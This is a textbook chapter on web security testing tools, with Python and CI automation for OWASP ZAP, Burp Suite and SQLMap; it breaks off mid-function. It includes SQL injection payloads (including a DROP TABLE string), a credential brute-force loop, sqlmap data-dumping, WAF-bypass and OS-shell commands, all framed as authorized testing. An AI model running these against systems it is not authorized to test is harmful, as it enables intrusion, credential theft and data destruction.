# **Chapter 39: Security Testing Tools**

---

## **39.1 OWASP ZAP (Zed Attack Proxy)**

### **39.1.1 Introduction and Setup**

**What is OWASP ZAP?**

OWASP Zed Attack Proxy (ZAP) is the world's most widely used open-source web application security scanner. Developed by the Open Web Application Security Project (OWASP), ZAP is designed to be used by both beginners and experienced penetration testers. It operates as a "man-in-the-middle" proxy, allowing you to inspect and modify traffic between your browser and the web application.

**Key Features:**
- **Passive Scanning:** Analyzes traffic without modifying requests
- **Active Scanning:** Automatically sends crafted attacks to find vulnerabilities
- **Spidering:** Crawls applications to discover content and functionality
- **API Testing:** Native support for REST, SOAP, and GraphQL APIs
- **Automation:** Full automation capabilities for CI/CD integration
- **Extensibility:** Marketplace with hundreds of add-ons

**Installation and Setup:**

```bash
# Installation on different platforms

# Linux (Ubuntu/Debian)
sudo apt update
sudo apt install zaproxy

# macOS
brew install --cask owasp-zap

# Windows
# Download installer from: https://www.zaproxy.org/download/

# Docker (Recommended for CI/CD)
docker pull ghcr.io/zaproxy/zaproxy:stable
docker run -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py -t http://target.com

# Python API Client
pip install python-owasp-zap-v2.4
```

**Initial Configuration:**

```python
# Python script to automate ZAP setup
from zapv2 import ZAPv2
import time

class ZAPSecurityScanner:
    def __init__(self, api_key='changeme', proxy='http://localhost:8080'):
        """
        Initialize ZAP connection
        Default proxy: localhost:8080 (ZAP must be running)
        """
        self.zap = ZAPv2(apikey=api_key, proxies={'http': proxy, 'https': proxy})
        self.core = self.zap.core
        self.spider = self.zap.spider
        self.ascan = self.zap.ascan
        self.pscan = self.zap.psan  # Passive scan
        
    def configure_scan_policy(self):
        """
        Configure active scan policy for comprehensive testing
        """
        # Create custom scan policy
        policy_name = "Comprehensive_Scan"
        
        # Disable dangerous scanners in production
        self.zap.ascan.disable_scanners(
            scanner_ids=[40018, 40019, 40020],  # SQLi scanners (use SQLMap instead)
            scanpolicyname=policy_name
        )
        
        # Configure alert thresholds
        self.zap.core.set_option_alert_threshold("MEDIUM")
        
        return policy_name
    
    def spider_target(self, target_url, max_children=10):
        """
        Spider (crawl) the target application to discover content
        """
        print(f"Starting Spider scan on {target_url}")
        
        # Start spidering
        scan_id = self.spider.scan(url=target_url, maxchildren=max_children)
        
        # Wait for spider to complete
        while int(self.spider.status(scan_id)) < 100:
            print(f"Spider progress: {self.spider.status(scan_id)}%")
            time.sleep(2)
        
        print("Spider scan completed")
        
        # Return discovered URLs
        return self.spider.results(scan_id)
    
    def run_active_scan(self, target_url, scan_policy=None):
        """
        Perform active vulnerability scanning
        """
        print(f"Starting Active Scan on {target_url}")
        
        # Start active scan
        scan_id = self.ascan.scan(
            url=target_url,
            scanpolicyname=scan_policy,
            recurse=True
        )
        
        # Monitor scan progress
        while int(self.ascan.status(scan_id)) < 100:
            progress = self.ascan.status(scan_id)
            print(f"Active Scan progress: {progress}%")
            
            # Get current alerts found so far
            alerts = self.core.alerts(baseurl=target_url)
            print(f"Alerts found so far: {len(alerts)}")
            
            time.sleep(5)
        
        print("Active scan completed")
        return scan_id
    
    def generate_security_report(self, target_url, report_path="zap_report.html"):
        """
        Generate comprehensive HTML report
        """
        # Get all alerts
        alerts = self.core.alerts(baseurl=target_url)
        
        # Categorize by risk
        risk_categories = {
            'High': [],
            'Medium': [],
            'Low': [],
            'Informational': []
        }
        
        for alert in alerts:
            risk = alert.get('risk')
            if risk in risk_categories:
                risk_categories[risk].append({
                    'name': alert.get('name'),
                    'description': alert.get('description'),
                    'solution': alert.get('solution'),
                    'url': alert.get('url'),
                    'param': alert.get('param'),
                    'evidence': alert.get('evidence')
                })
        
        # Generate HTML report using ZAP's API
        report_html = self.core.htmlreport()
        
        with open(report_path, 'w', encoding='utf-8') as f:
            f.write(report_html)
        
        # Generate JSON report for programmatic processing
        report_json = self.core.jsonreport()
        with open(report_path.replace('.html', '.json'), 'w') as f:
            f.write(report_json)
        
        return {
            'high': len(risk_categories['High']),
            'medium': len(risk_categories['Medium']),
            'low': len(risk_categories['Low']),
            'info': len(risk_categories['Informational']),
            'report_path': report_path
        }

# Usage Example
if __name__ == "__main__":
    scanner = ZAPSecurityScanner(api_key='your-api-key')
    
    target = "http://localhost:5000"
    
    # Step 1: Spider the application
    discovered_urls = scanner.spider_target(target)
    print(f"Discovered {len(discovered_urls)} URLs")
    
    # Step 2: Run active scan
    scanner.run_active_scan(target)
    
    # Step 3: Generate report
    results = scanner.generate_security_report(target)
    print(f"Scan complete. High: {results['high']}, Medium: {results['medium']}")
```

### **39.1.2 Scanning Web Applications**

**Passive vs. Active Scanning:**

```python
# Understanding Passive Scanning
class PassiveScanning:
    """
    Passive scanning observes traffic without modifying requests.
    It detects vulnerabilities by analyzing request/response patterns.
    """
    
    def configure_passive_scanning(self, zap_instance):
        """
        Configure passive scanning rules
        """
        # Passive scanning happens automatically when proxying traffic
        # Configure which rules to enable
        
        passive_scan_rules = {
            '10010': 'Cookie No HttpOnly Flag',
            '10011': 'Cookie Without Secure Flag',
            '10015': 'Incomplete or No Cache-control Header',
            '10020': 'X-Frame-Options Header Not Set',
            '10021': 'X-Content-Type-Options Header Missing',
            '10035': 'Strict-Transport-Security Header',
            '40012': 'Cross Domain Script Inclusion',
            '40014': 'Cross Domain Misconfiguration',
            '40016': 'Web Browser XSS Protection',
            '40017': 'Cross Domain JavaScript Source File'
        }
        
        # Enable all passive rules
        for rule_id, description in passive_scan_rules.items():
            zap_instance.pscan.enable_scanners(rule_id)
        
        return passive_scan_rules

# Active Scanning Configuration
class ActiveScanning:
    """
    Active scanning sends attack payloads to detect vulnerabilities.
    Use with caution - can modify data or cause DoS.
    """
    
    def configure_active_scan(self, zap_instance, context_name):
        """
        Configure active scanning with safe parameters
        """
        # Set scan policy
        scan_policy = "Default Policy"
        
        # Configure attack strength
        # LOW: Fewer attacks, faster, less likely to cause issues
        # MEDIUM: Balanced approach
        # HIGH: Comprehensive attacks, slower, higher risk
        # INSANE: Maximum attacks, very slow, high risk of side effects
        
        zap_instance.ascan.set_option_attack_strength("MEDIUM")
        zap_instance.ascan.set_option_alert_threshold("MEDIUM")
        
        # Configure scan speed (delay between requests)
        # Important to avoid overwhelming the target
        zap_instance.ascan.set_option_delay_in_ms(100)  # 100ms delay
        
        # Enable specific scanners
        # Format: scanner_id: name
        scanners_to_enable = {
            '40012': 'Cross Domain Script Inclusion',
            '40014': 'Cross Domain Misconfiguration',
            '40018': 'SQL Injection',
            '40019': 'SQL Injection MySQL',
            '40020': 'SQL Injection Hypersonic',
            '40021': 'SQL Injection Oracle',
            '40022': 'SQL Injection PostgreSQL',
            '40024': 'SQL Injection SQLite',
            '40026': 'Cross Site Scripting (DOM Based)',
            '40027': 'Cross Site Scripting (Reflected)',
            '40028': 'Cross Site Scripting (Persistent)',
            '40029': 'Cross Site Scripting (Persistent Prime)',
            '40030': 'Cross Site Scripting (Persistent Spider)',
            '40032': '.htaccess Information Leak',
            '40034': 'Directory Traversal',
            '40035': 'Path Traversal'
        }
        
        for scanner_id in scanners_to_enable.keys():
            zap_instance.ascan.enable_scanners(scanner_id, scanpolicyname=scan_policy)
        
        return scan_policy
    
    def authenticated_scanning(self, zap_instance, target, login_url, username, password):
        """
        Perform authenticated scanning with form-based authentication
        """
        # Create context
        context_name = "Authenticated_Scan"
        context_id = zap_instance.context.new_context(context_name)
        
        # Include target in context
        zap_instance.context.include_in_context(context_name, f"{target}.*")
        
        # Set up authentication
        auth_method = "formBasedAuthentication"
        
        # Login POST data
        login_data = (
            f"loginUrl={login_url}&"
            f"loginRequestData=username={username}&password={password}"
        )
        
        zap_instance.authentication.set_authentication_method(
            context_id, auth_method, login_data
        )
        
        # Set logged in/out indicators
        zap_instance.authentication.set_logged_in_indicator(context_id, "Welcome.*user")
        zap_instance.authentication.set_logged_out_indicator(context_id, "Login.*page")
        
        # Create user
        user_id = zap_instance.users.new_user(context_id, "TestUser")
        zap_instance.users.set_authentication_credentials(
            context_id, user_id, f"username={username}&password={password}"
        )
        zap_instance.users.set_user_enabled(context_id, user_id, True)
        
        # Run spider as user
        zap_instance.spider.scan_as_user(context_id, user_id, target)
        
        # Run active scan as user
        zap_instance.ascan.scan_as_user(target, context_id, user_id)
```

### **39.1.3 API Security Testing with ZAP**

```python
# API Security Testing
class ZAPAPITesting:
    """
    Testing REST and GraphQL APIs with ZAP
    """
    
    def import_openapi_spec(self, zap_instance, spec_url, target_url):
        """
        Import OpenAPI/Swagger specification for API testing
        """
        # Import OpenAPI definition
        zap_instance.openapi.import_url(spec_url, target_url)
        
        print(f"Imported API definition from {spec_url}")
        
        # Get list of imported URLs
        urls = zap_instance.core.urls()
        api_endpoints = [url for url in urls if url.startswith(target_url)]
        
        return api_endpoints
    
    def test_rest_api(self, zap_instance, base_url, endpoints):
        """
        Comprehensive REST API security testing
        """
        results = {}
        
        for endpoint in endpoints:
            full_url = f"{base_url}{endpoint}"
            
            # Spider the endpoint
            print(f"Spidering {full_url}")
            scan_id = zap_instance.spider.scan(full_url)
            
            while int(zap_instance.spider.status(scan_id)) < 100:
                time.sleep(1)
            
            # Active scan
            print(f"Active scanning {full_url}")
            ascan_id = zap_instance.ascan.scan(full_url)
            
            while int(zap_instance.ascan.status(ascan_id)) < 100:
                time.sleep(2)
            
            # Get alerts for this endpoint
            alerts = zap_instance.core.alerts(baseurl=full_url)
            results[endpoint] = {
                'alert_count': len(alerts),
                'high_risk': len([a for a in alerts if a['risk'] == 'High']),
                'medium_risk': len([a for a in alerts if a['risk'] == 'Medium']),
                'details': alerts
            }
        
        return results
    
    def graphql_security_testing(self, zap_instance, endpoint):
        """
        Specialized GraphQL security testing
        """
        # GraphQL introspection query to discover schema
        introspection_query = """
        query IntrospectionQuery {
          __schema {
            queryType { name }
            mutationType { name }
            subscriptionType { name }
            types {
              ...FullType
            }
          }
        }
        fragment FullType on __Type {
          name
          kind
          fields {
            name
            type { name }
          }
        }
        """
        
        # Import GraphQL endpoint
        zap_instance.graphql.import_url(endpoint)
        
        # Run GraphQL-specific scans
        # ZAP will test for:
        # - GraphQL Injection
        # - Introspection enabled (information disclosure)
        # - Depth limit attacks
        # - Batch query attacks
        
        scan_id = zap_instance.ascan.scan(endpoint)
        
        return scan_id
```

### **39.1.4 CI/CD Integration**

```yaml
# GitHub Actions Integration
# .github/workflows/security-scan.yml
name: OWASP ZAP Security Scan

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]
  schedule:
    # Run nightly
    - cron: '0 0 * * *'

jobs:
  zap_scan:
    runs-on: ubuntu-latest
    name: Security Scan with ZAP
    
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      
      - name: Start application
        run: |
          docker-compose up -d
          sleep 30  # Wait for app to start
      
      - name: ZAP Baseline Scan
        uses: zaproxy/action-baseline@v0.7.0
        with:
          target: 'http://localhost:8080'
          rules_file_name: '.zap/rules.tsv'
          cmd_options: '-a'  # Include passive scan results
      
      - name: ZAP Full Scan
        if: github.event_name == 'schedule'
        uses: zaproxy/action-full-scan@v0.4.0
        with:
          target: 'http://localhost:8080'
          rules_file_name: '.zap/rules.tsv'
          cmd_options: '-a -j'
      
      - name: Upload ZAP Report
        uses: actions/upload-artifact@v3
        with:
          name: zap-report
          path: report_*.html
      
      - name: Check for High Risk Alerts
        run: |
          if grep -q "High" report_*.html; then
            echo "::error::High risk vulnerabilities found!"
            exit 1
          fi
```

```python
# Jenkins Pipeline Integration
# Jenkinsfile snippet
pipeline {
    agent any
    
    stages {
        stage('Security Scan') {
            steps {
                script {
                    // Start ZAP in daemon mode
                    sh '''
                        docker run -d --name zap -p 8090:8090 \
                        -v $(pwd):/zap/wrk/:rw \
                        ghcr.io/zaproxy/zaproxy:stable \
                        zap.sh -daemon -host 0.0.0.0 -port 8090 \
                        -config api.key=changeme
                    '''
                    
                    // Wait for ZAP to start
                    sleep 30
                    
                    // Run baseline scan
                    sh '''
                        docker run --rm -v $(pwd):/zap/wrk/:rw \
                        ghcr.io/zaproxy/zaproxy:stable \
                        zap-baseline.py \
                        -t http://target-app:8080 \
                        -r zap-report.html \
                        -J zap-report.json \
                        -w zap-report.md \
                        -z "-config scanner.attackOnStart=true"
                    '''
                    
                    // Archive results
                    archiveArtifacts artifacts: 'zap-report.*'
                    
                    // Parse JSON report for thresholds
                    def report = readJSON file: 'zap-report.json'
                    def highCount = report.site[0].alerts.count { it.riskcode == '3' }
                    
                    if (highCount > 0) {
                        error("Found ${highCount} high risk vulnerabilities!")
                    }
                }
            }
        }
    }
    
    post {
        always {
            sh 'docker rm -f zap || true'
        }
    }
}
```

---

## **39.2 Burp Suite Professional**

### **39.2.1 Introduction to Burp Suite**

**What is Burp Suite?**

Burp Suite is an integrated platform for performing security testing of web applications. Developed by PortSwigger, it is the industry standard for manual penetration testing and vulnerability research. While ZAP is excellent for automation, Burp Suite excels at manual testing with its sophisticated tools for request interception, modification, and analysis.

**Editions:**
- **Community Edition:** Free, limited features, manual testing only
- **Professional:** Paid, includes automated scanner, advanced tools, extensions
- **Enterprise:** Paid, scalable automation for CI/CD

**Key Components:**
- **Proxy:** Intercept and modify HTTP/HTTPS traffic
- **Repeater:** Manually modify and resend requests
- **Intruder:** Automated attacks (fuzzing, brute force)
- **Scanner:** Automated vulnerability detection (Pro only)
- **Decoder:** Encode/decode data (URL, Base64, HTML, etc.)
- **Comparer:** Compare requests/responses
- **Sequencer:** Analyze session token randomness
- **Extender:** Install extensions (BApp Store)

### **39.2.2 Proxy Configuration and Interception**

```python
# Python script to configure browser proxy for Burp
# This helps automate the setup process

import subprocess
import platform
import os

class BurpProxyConfigurator:
    def __init__(self, proxy_host='127.0.0.1', proxy_port=8080):
        self.proxy = f"{proxy_host}:{proxy_port}"
        self.ca_cert_url = f"http://{proxy_host}:{proxy_port}/cert"
        
    def download_ca_certificate(self):
        """
        Download Burp CA certificate for HTTPS interception
        """
        import urllib.request
        import ssl
        
        # Create unverified context to download cert
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        
        cert_path = "cacert.der"
        
        try:
            urllib.request.urlretrieve(
                self.ca_cert_url, 
                cert_path,
                context=ctx
            )
            print(f"CA Certificate downloaded to {cert_path}")
            
            # Convert to PEM format for easier installation
            subprocess.run([
                'openssl', 'x509', '-inform', 'DER', '-in', cert_path,
                '-out', 'cacert.pem'
            ])
            
            return cert_path
        except Exception as e:
            print(f"Error downloading certificate: {e}")
            return None
    
    def configure_firefox_proxy(self):
        """
        Configure Firefox to use Burp Proxy
        """
        # Firefox profiles location
        if platform.system() == "Windows":
            profiles_path = os.path.expandvars(r"%APPDATA%\Mozilla\Firefox\Profiles")
        else:
            profiles_path = os.path.expanduser("~/.mozilla/firefox")
        
        # This would require modifying prefs.js or using Firefox profiles
        # Simplified example - in practice use WebDriver or manual config
        prefs = f"""
        user_pref("network.proxy.type", 1);
        user_pref("network.proxy.http", "{self.proxy.split(':')[0]}");
        user_pref("network.proxy.http_port", {self.proxy.split(':')[1]});
        user_pref("network.proxy.ssl", "{self.proxy.split(':')[0]}");
        user_pref("network.proxy.ssl_port", {self.proxy.split(':')[1]});
        user_pref("network.proxy.no_proxies_on", "localhost, 127.0.0.1");
        """
        
        print("Add these preferences to your Firefox profile:")
        print(prefs)
    
    def generate_proxy_pac(self):
        """
        Generate Proxy Auto-Config (PAC) file for selective proxying
        """
        pac_content = f"""
        function FindProxyForURL(url, host) {{
            // Proxy only specific domains for testing
            if (shExpMatch(host, "*.test.local") ||
                shExpMatch(host, "*localhost*") ||
                shExpMatch(host, "*.internal.com")) {{
                return "PROXY {self.proxy}";
            }}
            
            // Direct connection for everything else
            return "DIRECT";
        }}
        """
        
        with open("proxy.pac", "w") as f:
            f.write(pac_content)
        
        print("Generated proxy.pac for selective proxying")

# Burp Proxy Interception Script
# Using Burp's REST API (requires Burp Pro with REST API extension)
import requests

class BurpAPI:
    def __init__(self, api_url='http://localhost:1337', api_key=''):
        self.api_url = api_url
        self.headers = {'Authorization': api_key}
    
    def get_proxy_history(self):
        """
        Retrieve intercepted requests from proxy history
        """
        response = requests.get(
            f"{self.api_url}/v0.1/proxy/history",
            headers=self.headers
        )
        return response.json()
    
    def send_to_repeater(self, request_data):
        """
        Send request to Repeater for manual modification
        """
        response = requests.post(
            f"{self.api_url}/v0.1/repeater",
            headers=self.headers,
            json=request_data
        )
        return response.json()
    
    def intercept_requests(self, intercept=True):
        """
        Toggle interception on/off
        """
        status = "on" if intercept else "off"
        response = requests.put(
            f"{self.api_url}/v0.1/proxy/intercept",
            headers=self.headers,
            json={"state": status}
        )
        return response.status_code == 200
```

### **39.2.3 Intruder and Repeater**

**Using Intruder for Automated Attacks:**

```python
# Python script to generate Burp Intruder payloads
# and analyze results programmatically

class IntruderAutomation:
    """
    Automating Burp Intruder-style attacks using Python requests
    This is useful when Burp Pro license is not available
    """
    
    def __init__(self, base_url):
        self.base_url = base_url
        self.session = requests.Session()
        # Configure to use Burp as proxy
        self.session.proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }
        # Disable SSL warnings when using Burp CA
        requests.packages.urllib3.disable_warnings()
        self.session.verify = False
    
    def sniper_attack(self, target_url, param_name, payloads):
        """
        Sniper attack: One payload at a time in one position
        Best for: Testing single parameter with many values
        """
        results = []
        
        for payload in payloads:
            # Replace parameter with payload
            params = {param_name: payload}
            
            try:
                response = self.session.get(target_url, params=params)
                
                # Analyze response
                result = {
                    'payload': payload,
                    'status_code': response.status_code,
                    'length': len(response.content),
                    'response_time': response.elapsed.total_seconds(),
                    'indicators': self._analyze_response(response)
                }
                results.append(result)
                
                # Print interesting findings
                if result['indicators']['potential_vulnerability']:
                    print(f"[!] Potential issue with payload: {payload}")
                    
            except Exception as e:
                print(f"Error with payload {payload}: {e}")
        
        return results
    
    def battering_ram_attack(self, target_url, params_dict, payload):
        """
        Battering Ram: Same payload in all positions simultaneously
        Best for: Testing same credentials across multiple fields
        """
        # Replace all values with payload
        modified_params = {k: payload for k in params_dict.keys()}
        
        response = self.session.post(target_url, data=modified_params)
        return {
            'payload': payload,
            'response': response.text,
            'status': response.status_code
        }
    
    def pitchfork_attack(self, target_url, param_positions, payload_sets):
        """
        Pitchfork: Multiple payloads simultaneously from different sets
        Best for: Testing username/password combinations
        """
        results = []
        
        # Zip payloads together (parallel iteration)
        for payloads in zip(*payload_sets):
            data = dict(zip(param_positions, payloads))
            
            response = self.session.post(target_url, data=data)
            results.append({
                'payloads': data,
                'status': response.status_code,
                'length': len(response.content)
            })
        
        return results
    
    def cluster_bomb_attack(self, target_url, username_param, password_param, 
                           usernames, passwords):
        """
        Cluster Bomb: All combinations of payloads
        Best for: Brute force username/password
        WARNING: Only use with permission and rate limiting!
        """
        results = []
        
        for username in usernames:
            for password in passwords:
                data = {
                    username_param: username,
                    password_param: password
                }
                
                # Add delay to avoid rate limiting
                time.sleep(1)
                
                response = self.session.post(target_url, data=data)
                
                # Check for successful login indicators
                is_success = self._check_login_success(response)
                
                results.append({
                    'username': username,
                    'password': password,
                    'success': is_success,
                    'status': response.status_code
                })
                
                if is_success:
                    print(f"[+] Valid credentials found: {username}:{password}")
                    return results
        
        return results
    
    def _analyze_response(self, response):
        """
        Analyze response for vulnerability indicators
        """
        indicators = {
            'error_messages': [],
            'timing_anomaly': False,
            'content_diff': False,
            'potential_vulnerability': False
        }
        
        # Check for SQL errors
        sql_errors = [
            'sql syntax',
            'mysql_fetch',
            'ORA-',
            'PostgreSQL',
            'SQLite',
            'syntax error'
        ]
        
        content = response.text.lower()
        for error in sql_errors:
            if error in content:
                indicators['error_messages'].append(error)
                indicators['potential_vulnerability'] = True
        
        # Check for XSS reflection
        if '<script>' in content and 'alert' in content:
            indicators['potential_vulnerability'] = True
        
        return indicators
    
    def _check_login_success(self, response):
        """
        Determine if login was successful based on response
        """
        # Check for common success indicators
        success_indicators = [
            'welcome',
            'dashboard',
            'logout',
            'profile',
            'welcome back'
        ]
        
        # Check for common failure indicators
        failure_indicators = [
            'invalid',
            'incorrect',
            'failed',
            'error',
            'try again'
        ]
        
        content = response.text.lower()
        
        has_success = any(ind in content for ind in success_indicators)
        has_failure = any(ind in content for ind in failure_indicators)
        
        return has_success and not has_failure

# Example usage
if __name__ == "__main__":
    intruder = IntruderAutomation("http://target.com")
    
    # SQL Injection testing with Sniper attack
    sql_payloads = [
        "' OR '1'='1",
        "' OR 1=1--",
        "' UNION SELECT null--",
        "1' AND 1=1--",
        "1' AND 1=2--",
        "'; DROP TABLE users;--"
    ]
    
    results = intruder.sniper_attack(
        "http://target.com/search",
        "q",
        sql_payloads
    )
    
    # Analyze results for anomalies
    baseline_length = results[0]['length'] if results else 0
    for result in results:
        if abs(result['length'] - baseline_length) > 100:
            print(f"Anomaly detected with payload: {result['payload']}")
```

### **39.2.4 Scanner Features (Professional Edition)**

```python
# Burp Scanner Integration
class BurpScannerIntegration:
    """
    Integrating with Burp Scanner Professional via REST API
    Requires Burp Enterprise or Pro with REST API extension
    """
    
    def __init__(self, api_url, api_token):
        self.api_url = api_url
        self.headers = {
            'Authorization': f'Bearer {api_token}',
            'Content-Type': 'application/json'
        }
    
    def start_crawl(self, target_url, scope=None):
        """
        Start Burp Scanner crawl phase
        """
        payload = {
            "urls": [target_url],
            "scope": scope or {"type": "Broad", "url": target_url},
            "scan_configurations": ["Crawl strategy - fastest"]
        }
        
        response = requests.post(
            f"{self.api_url}/scans",
            headers=self.headers,
            json=payload
        )
        
        return response.json().get('scan_id')
    
    def start_audit(self, crawl_id, scan_config=None):
        """
        Start audit (vulnerability detection) after crawl
        """
        payload = {
            "crawl_id": crawl_id,
            "scan_configurations": scan_config or ["Audit checks - light active"]
        }
        
        response = requests.post(
            f"{self.api_url}/scans/{crawl_id}/audit",
            headers=self.headers,
            json=payload
        )
        
        return response.json()
    
    def get_scan_results(self, scan_id):
        """
        Retrieve vulnerability findings from scan
        """
        response = requests.get(
            f"{self.api_url}/scans/{scan_id}/results",
            headers=self.headers
        )
        
        findings = response.json()
        
        # Categorize by severity
        categorized = {
            'Critical': [],
            'High': [],
            'Medium': [],
            'Low': [],
            'Information': []
        }
        
        for issue in findings.get('issues', []):
            severity = issue.get('severity', 'Information')
            if severity in categorized:
                categorized[severity].append({
                    'name': issue.get('name'),
                    'description': issue.get('description'),
                    'remediation': issue.get('remediation'),
                    'evidence': issue.get('evidence'),
                    'confidence': issue.get('confidence')
                })
        
        return categorized
    
    def generate_report(self, scan_id, report_type='HTML'):
        """
        Generate scan report
        """
        response = requests.post(
            f"{self.api_url}/scans/{scan_id}/report",
            headers=self.headers,
            json={"format": report_type}
        )
        
        return response.content  # Binary report data
```

---

## **39.3 SQLMap**

### **39.3.1 SQL Injection Testing**

**What is SQLMap?**

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It supports a wide range of database engines and injection techniques.

**Key Capabilities:**
- Automatic detection of SQL injection vulnerabilities
- Support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, and more
- Multiple injection techniques: Boolean-based blind, Time-based blind, Error-based, UNION query-based, Stacked queries
- Database fingerprinting and enumeration
- Data extraction (tables, columns, rows)
- File system access and command execution (on supported databases)

**Basic Usage:**

```bash
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch

# Test POST data
sqlmap -u "http://target.com/login" --data="username=admin&password=test" --batch

# Test with cookies
sqlmap -u "http://target.com/profile" --cookie="session=abc123" --batch

# Specify database type (if known)
sqlmap -u "http://target.com/page.php?id=1" --dbms=mysql --batch

# Level and Risk (0-5, higher = more thorough but slower)
sqlmap -u "http://target.com/page.php?id=1" --level=3 --risk=2 --batch
```

**Python Integration:**

```python
# SQLMap Python API Integration
import subprocess
import json
import os

class SQLMapScanner:
    def __init__(self, target_url, output_dir="sqlmap_output"):
        self.target = target_url
        self.output_dir = output_dir
        self.session_file = os.path.join(output_dir, "session.sqlite")
        
        # Create output directory
        os.makedirs(output_dir, exist_ok=True)
    
    def detect_vulnerability(self, method="GET", data=None, cookies=None, headers=None):
        """
        Run SQLMap to detect SQL injection vulnerabilities
        """
        cmd = [
            'sqlmap',
            '-u', self.target,
            '--batch',  # Non-interactive mode
            '--level=2',
            '--risk=1',
            '--output-dir', self.output_dir,
            '--flush-session',  # Fresh scan
            '--technique=BEUSTQ',  # All techniques: B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline
            '--format', 'json',
            '-v', '0'  # Minimal verbosity
        ]
        
        if method == "POST" and data:
            cmd.extend(['--data', data])
        
        if cookies:
            cmd.extend(['--cookie', cookies])
        
        if headers:
            for header, value in headers.items():
                cmd.extend(['--header', f"{header}: {value}"])
        
        try:
            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300  # 5 minute timeout
            )
            
            # Parse output for vulnerabilities
            vulnerabilities = self._parse_detection_output(result.stdout)
            
            return {
                'vulnerable': len(vulnerabilities) > 0,
                'vulnerabilities': vulnerabilities,
                'raw_output': result.stdout,
                'errors': result.stderr if result.stderr else None
            }
            
        except subprocess.TimeoutExpired:
            return {'error': 'Scan timeout', 'vulnerable': False}
        except Exception as e:
            return {'error': str(e), 'vulnerable': False}
    
    def enumerate_databases(self, technique=None):
        """
        Enumerate available databases (requires confirmed vulnerability)
        """
        cmd = [
            'sqlmap',
            '-u', self.target,
            '--batch',
            '--dbs',  # Enumerate databases
            '--output-dir', self.output_dir
        ]
        
        if technique:
            cmd.extend(['--technique', technique])
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        # Parse database list from output
        databases = []
        for line in result.stdout.split('\n'):
            if '[*]' in line and 'information_schema' not in line:
                db_name = line.split(']')[-1].strip()
                if db_name and db_name not in ['[*]', '']:
                    databases.append(db_name)
        
        return databases
    
    def enumerate_tables(self, database):
        """
        Enumerate tables in specific database
        """
        cmd = [
            'sqlmap',
            '-u', self.target,
            '--batch',
            '-D', database,
            '--tables',
            '--output-dir', self.output_dir
        ]
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        tables = []
        in_table_section = False
        
        for line in result.stdout.split('\n'):
            if 'Database:' in line and database in line:
                in_table_section = True
            elif in_table_section and '|' in line:
                table_name = line.split('|')[1].strip()
                if table_name and table_name != 'Table':
                    tables.append(table_name)
        
        return tables
    
    def dump_table_data(self, database, table, columns=None, limit=100):
        """
        Extract data from specific table
        WARNING: Only use with explicit authorization!
        """
        cmd = [
            'sqlmap',
            '-u', self.target,
            '--batch',
            '-D', database,
            '-T', table,
            '--dump',
            '--start=1',
            f'--stop={limit}',
            '--output-dir', self.output_dir
        ]
        
        if columns:
            cmd.extend(['-C', ','.join(columns)])
        
        # Add delay to avoid overwhelming target
        cmd.extend(['--delay=1'])
        
        result = subprocess.run(cmd, capture_output=True, text=True)
        
        # Parse CSV output from sqlmap
        csv_file = os.path.join(
            self.output_dir,
            self.target.replace('http://', '').replace('https://', ''),
            database,
            table
        )
        
        data = []
        if os.path.exists(csv_file + ".csv"):
            import csv
            with open(csv_file + ".csv", 'r') as f:
                reader = csv.DictReader(f)
                for row in reader:
                    data.append(row)
        
        return data
    
    def test_waf_bypass(self):
        """
        Attempt to bypass Web Application Firewall
        """
        tamper_scripts = [
            'space2comment',      # Replace spaces with comments
            'charencode',         # URL encode characters
            'randomcase',         # Random case for keywords
            'space2hash',         # Replace spaces with hashes
            'between',            # Use BETWEEN instead of >
            'modsecurityversioned'  # ModSecurity bypass
        ]
        
        results = []
        
        for tamper in tamper_scripts:
            cmd = [
                'sqlmap',
                '-u', self.target,
                '--batch',
                '--tamper', tamper,
                '--level=3',
                '--risk=2',
                '--technique=B'  # Boolean-based only for speed
            ]
            
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
            
            if 'injection point' in result.stdout.lower():
                results.append({
                    'tamper_script': tamper,
                    'success': True,
                    'details': 'Injection point found with tamper'
                })
            else:
                results.append({
                    'tamper_script': tamper,
                    'success': False
                })
        
        return results
    
    def _parse_detection_output(self, output):
        """
        Parse SQLMap output to extract vulnerability details
        """
        vulnerabilities = []
        
        if 'sqlmap identified the following injection point' in output:
            # Extract injection details
            lines = output.split('\n')
            current_vuln = {}
            
            for line in lines:
                if 'Parameter:' in line:
                    current_vuln['parameter'] = line.split('Parameter:')[1].strip()
                elif 'Type:' in line:
                    current_vuln['type'] = line.split('Type:')[1].strip()
                elif 'Title:' in line:
                    current_vuln['title'] = line.split('Title:')[1].strip()
                elif 'Payload:' in line:
                    current_vuln['payload'] = line.split('Payload:')[1].strip()
                    if current_vuln:
                        vulnerabilities.append(current_vuln.copy())
                        current_vuln = {}
        
        return vulnerabilities

# Usage Example
if __name__ == "__main__":
    scanner = SQLMapScanner("http://testphp.vulnweb.com/artists.php?artist=1")
    
    # Step 1: Detect vulnerability
    detection = scanner.detect_vulnerability()
    
    if detection['vulnerable']:
        print(f"[!] SQL Injection detected!")
        for vuln in detection['vulnerabilities']:
            print(f"Parameter: {vuln['parameter']}")
            print(f"Type: {vuln['type']}")
            print(f"Payload: {vuln['payload']}")
        
        # Step 2: Enumerate databases (only if explicitly authorized)
        # databases = scanner.enumerate_databases()
        # print(f"Databases found: {databases}")
```

### **39.3.2 Advanced SQLMap Techniques**

```python
# Advanced SQLMap automation for comprehensive testing
class AdvancedSQLMap:
    """
    Advanced SQLMap techniques for professional security testing
    """
    
    def __init__(self, target):
        self.target = target
        self.base_cmd = ['sqlmap', '-u', target, '--batch']
    
    def os_shell_access(self):
        """
        Attempt to obtain operating system shell (if database supports)
        Requires: Stacked queries support and sufficient privileges
        WARNING: Highly invasive - only with explicit written permission!
        """
        cmd = self.base_cmd + [
            '--os-shell',
            '--technique=S',  # Stacked queries
